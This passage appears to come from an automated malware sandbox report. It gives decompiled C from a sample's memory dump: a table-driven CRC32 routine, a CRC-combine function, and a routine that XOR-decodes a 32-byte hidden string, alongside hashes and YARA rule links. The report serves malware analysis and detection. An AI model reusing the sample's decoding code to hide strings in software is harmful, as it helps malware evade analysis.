4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x18) * 4) ^  *(0x41beb0 + (_t110 & 0x000000ff) * 4) ^  *(_t181 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t214 >> 0x18) * 4) ^  *(0x41beb0 + (_t214 & 0x000000ff) * 4) ^  *(_t182 - 4);
						_t175 = _t182 + 4;
						_t239 = _t239 - 0x20;
						_t87 =  *(0x41b6b0 + (( *(0x41b6b0 + (_t119 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t119 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t119 >> 0x18) * 4) ^  *(0x41beb0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (_t119 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t119 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t119 >> 0x18) * 4) ^  *(0x41beb0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (_t119 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t119 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t119 >> 0x18) * 4) ^  *(0x41beb0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x18) * 4) ^  *(0x41beb0 + (_t223 & 0x000000ff) * 4);
						_t238 = _t238 - 1;
					} while (_t238 != 0);
				}
				if(_t239 >= 4) {
					_t188 = _t239 >> 2;
					do {
						_t90 = _t87 ^  *_t175;
						_t175 = _t175 + 4;
						_t239 = _t239 - 4;
						_t188 = _t188 - 1;
						_t87 =  *(0x41b6b0 + (_t90 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t90 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t90 >> 0x18) * 4) ^  *(0x41beb0 + (_t90 & 0x000000ff) * 4);
					} while (_t188 != 0);
				}
				if(_t239 != 0) {
					do {
						_t87 = _t87 >> 0x00000008 ^  *(0x41b2b0 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t239 = _t239 - 1;
					} while (_t239 != 0);
				}
				return  !_t87;
			}

0x004028b0
0x004028b1
0x004028b3
0x004028b7
0x004028c0
0x004028d3
0x004028da
0x004028db
0x004028de
0x00000000
0x00000000
0x00000000
0x004028de
0x004028c0
0x004028e0
0x004028e5
0x004028ed
0x004028f0
0x004028f0
0x00402931
0x00402934
0x00402976
0x00402979
0x004029bb
0x00402a3c
0x00402a7b
0x00402a7e
0x00402a81
0x00402ac0
0x00402afb
0x00402b02
0x00402b02
0x004028f0
0x00402b0e
0x00402b12
0x00402b15
0x00402b15
0x00402b17
0x00402b56
0x00402b59
0x00402b5c
0x00402b5c
0x00402b15
0x00402b64
0x00402b70
0x00402b7e
0x00402b85
0x00402b86
0x00402b86
0x00402b70
0x00402b8e

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC

Uniqueness

Uniqueness Score: -1.00%

Function 00401650, Relevance: .1, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00401650(signed char* _a4, intOrPtr _a8) {
				char _v4;
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed char _v8;
				signed char _v9;
				signed char _v10;
				signed char _v11;
				signed char _v12;
				signed char _v13;
				signed char _v14;
				signed char _v15;
				signed char _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				signed char _v21;
				signed char _v22;
				signed char _v23;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed char _v27;
				signed char _v28;
				signed char _v29;
				signed char _v30;
				signed char _v31;
				signed char _v32;
				signed char _v33;
				signed char _v34;
				signed char _v35;
				signed char _v36;
				void* __esi;
				signed char* _t68;
				intOrPtr _t72;
				void* _t137;
				intOrPtr _t138;

				_t68 = _a4;
				_v36 =  *_t68 & 0x000000ff ^ 0x000000a3;
				_v35 = _t68[1] & 0x000000ff ^ 0x00000054;
				_v34 =  !(_t68[2] & 0x000000ff);
				_v33 = _t68[3] & 0x000000ff ^ 0x00000075;
				_v32 = _t68[4] & 0x000000ff ^ 0x000000e7;
				_v31 = _t68[5] & 0x000000ff ^ 0x00000044;
				_v30 = _t68[6] & 0x000000ff ^ 0x0000004b;
				_v29 = _t68[7] & 0x000000ff ^ 0x00000023;
				_v28 = _t68[8] & 0x000000ff ^ 0x000000bf;
				_v27 = _t68[9] & 0x000000ff ^ 0x00000045;
				_v26 = _t68[0xa] & 0x000000ff ^ 0x0000003b;
				_v25 = _t68[0xb] & 0x000000ff ^ 0x00000056;
				_v24 = _t68[0xc] & 0x000000ff ^ 0x000000f8;
				_v23 = _t68[0xd] & 0x000000ff ^ 0x00000098;
				_v22 = _t68[0xe] & 0x000000ff ^ 0x0000005b;
				_v21 = _t68[0xf] & 0x000000ff ^ 0x000000f4;
				_v20 = _t68[0x10] & 0x000000ff ^ 0x000000b5;
				_v19 = _t68[0x11] & 0x000000ff ^ 0x00000087;
				_v18 = _t68[0x12] & 0x000000ff ^ 0x0000007b;
				_v17 = _t68[0x13] & 0x000000ff ^ 0x0000000f;
				_v16 = _t68[0x14] & 0x000000ff ^ 0x000000f4;
				_v15 = _t68[0x15] & 0x000000ff ^ 0x00000076;
				_v14 = _t68[0x16] & 0x000000ff ^ 0x000000b9;
				_v13 = _t68[0x17] & 0x000000ff ^ 0x00000034;
				_v12 = _t68[0x18] & 0x000000ff ^ 0x000000bf;
				_v11 = _t68[0x19] & 0x000000ff ^ 0x0000001e;
				_t138 = _a8;
				_v10 = _t68[0x1a] & 0x000000ff ^ 0x000000e7;
				_v9 = _t68[0x1b] & 0x000000ff ^ 0x00000078;
				_v8 = _t68[0x1c] & 0x000000ff ^ 0x00000098;
				_v7 = _t68[0x1d] & 0x000000ff ^ 0x000000e9;
				_v6 = _t68[0x1e] & 0x000000ff ^ 0x0000006f;
				_v5 = _t68[0x1f] & 0x000000ff ^ 0x000000b4;
				_v4 = 0;
				E0040B350(_t72, _t137, _t138, _t138,  &_v36, 0x20);
				return _t138;
			}

0x00401654
0x00401665
0x0040166d
0x0040167a
0x00401682
0x00401690
0x00401698
0x004016a6
0x004016ae
0x004016bc
0x004016c4
0x004016d2
0x004016da
0x004016e8
0x004016f0
0x004016fe
0x00401706
0x00401714
0x0040171c
0x0040172a
0x00401732
0x00401740
0x00401748
0x00401756
0x0040175e
0x0040176c
0x00401774
0x0040177c
0x00401786
0x0040178e
0x0040179c
0x004017a4
0x004017ba
0x004017be
0x004017c2
0x004017c7
0x004017d5

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77

Uniqueness

Uniqueness Score: -1.00%

Function 00402F20, Relevance: .1, Instructions: 103
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00402F20(signed int _a4, signed int _a8, signed int _a12) {
				char _v128;
				char _v256;
				void* __ebx;
				signed int _t37;
				signed int _t42;
				signed int _t43;
				signed int _t48;
				signed int _t49;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int* _t55;
				signed int* _t56;
				signed int* _t57;
				signed int* _t58;
				signed int _t59;
				signed int _t60;
				void* _t62;
				void* _t64;
				signed int _t66;
				signed int _t68;
				void* _t69;

				_t69 =  &_v256;
				if(_a12 != 0) {
					_t52 = 1;
					_v256 = 0xedb88320;
					_t37 = 1;
					do {
						 *(_t69 + _t37 * 4) = _t52;
						_t37 = _t37 + 1;
						_t52 = _t52 + _t52;
						__eflags = _t37 - 0x20;
					} while (_t37 < 0x20);
					E00402EE0( &_v128,  &_v256);
					E00402EE0( &_v256,  &_v128);
					_t42 = _a4;
					do {
						_t62 = 0;
						do {
							_t53 =  *(_t69 + _t62 + 0xc);
							_t66 = 0;
							_t57 =  &_v256;
							__eflags = _t53;
							while(_t53 != 0) {
								__eflags = _t53 & 0x00000001;
								if((_t53 & 0x00000001) != 0) {
									_t66 = _t66 ^  *_t57;
									__eflags = _t66;
								}
								_t53 = _t53 >> 1;
								_t57 =  &(_t57[1]);
								__eflags = _t53;
							}
							 *(_t69 + _t62 + 0x8c) = _t66;
							_t62 = _t62 + 4;
							__eflags = _t62 - 0x80;
						} while (_t62 < 0x80);
						_t48 = _a12;
						__eflags = _t48 & 0x00000001;
						if(__eflags != 0) {
							_t60 = 0;
							_t56 =  &_v128;
							__eflags = _t42;
							while(__eflags != 0) {
								__eflags = _t42 & 0x00000001;
								if((_t42 & 0x00000001) != 0) {
									_t60 = _t60 ^  *_t56;
									__eflags = _t60;
								}
								_t42 = _t42 >> 1;
								_t56 =  &(_t56[1]);
								__eflags = _t42;
							}
							_t42 = _t60;
						}
						_t49 = _t48 >> 1;
						if(__eflags != 0) {
							_t64 = 0;
							do {
								_t54 =  *(_t69 + _t64 + 0x8c);
								_t68 = 0;
								_t58 =  &_v128;
								__eflags = _t54;
								while(_t54 != 0) {
									__eflags = _t54 & 0x00000001;
									if((_t54 & 0x00000001) != 0) {
										_t68 = _t68 ^  *_t58;
										__eflags = _t68;
									}
									_t54 = _t54 >> 1;
									_t58 =  &(_t58[1]);
									__eflags = _t54;
								}
								 *(_t69 + _t64 + 0xc) = _t68;
								_t64 = _t64 + 4;
								__eflags = _t64 - 0x80;
							} while (_t64 < 0x80);
							__eflags = _t49 & 0x00000001;
							if(__eflags != 0) {
								_t59 = 0;
								_t55 =  &_v256;
								__eflags = _t42;
								while(__eflags != 0) {
									__eflags = _t42 & 0x00000001;
									if((_t42 & 0x00000001) != 0) {
